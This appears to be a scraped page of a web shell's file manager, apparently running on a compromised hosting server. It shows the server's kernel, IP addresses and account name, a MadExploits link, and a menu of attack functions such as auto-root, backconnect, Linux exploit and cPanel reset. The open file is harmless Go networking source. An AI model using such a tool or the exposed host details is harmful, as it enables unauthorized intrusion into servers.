Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
go /
pkg /
mod /
golang.org /
x /
net@v0.20.0 /
lif /
[ HOME SHELL ]
Name
Size
Permission
Action
address.go
2.48
KB
-r--r--r--
address_test.go
2.51
KB
-r--r--r--
binary.go
3.29
KB
-r--r--r--
defs_solaris.go
1.04
KB
-r--r--r--
lif.go
950
B
-r--r--r--
link.go
3.7
KB
-r--r--r--
link_test.go
1.38
KB
-r--r--r--
sys.go
399
B
-r--r--r--
sys_solaris_amd64.s
248
B
-r--r--r--
syscall.go
642
B
-r--r--r--
zsys_solaris_amd64.go
981
B
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : defs_solaris.go
// Copyright 2016 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. //go:build ignore // +godefs map struct_in_addr [4]byte /* in_addr */ // +godefs map struct_in6_addr [16]byte /* in6_addr */ package lif /* #include <sys/socket.h> #include <sys/sockio.h> #include <net/if.h> #include <net/if_types.h> */ import "C" type sockaddrStorage C.struct_sockaddr_storage const ( sysLIFC_NOXMIT = C.LIFC_NOXMIT sysLIFC_EXTERNAL_SOURCE = C.LIFC_EXTERNAL_SOURCE sysLIFC_TEMPORARY = C.LIFC_TEMPORARY sysLIFC_ALLZONES = C.LIFC_ALLZONES sysLIFC_UNDER_IPMP = C.LIFC_UNDER_IPMP sysLIFC_ENABLED = C.LIFC_ENABLED ) const ( sizeofLifnum = C.sizeof_struct_lifnum sizeofLifreq = C.sizeof_struct_lifreq sizeofLifconf = C.sizeof_struct_lifconf sizeofLifIfinfoReq = C.sizeof_struct_lif_ifinfo_req ) type lifnum C.struct_lifnum type lifreq C.struct_lifreq type lifconf C.struct_lifconf type lifIfinfoReq C.struct_lif_ifinfo_req
Close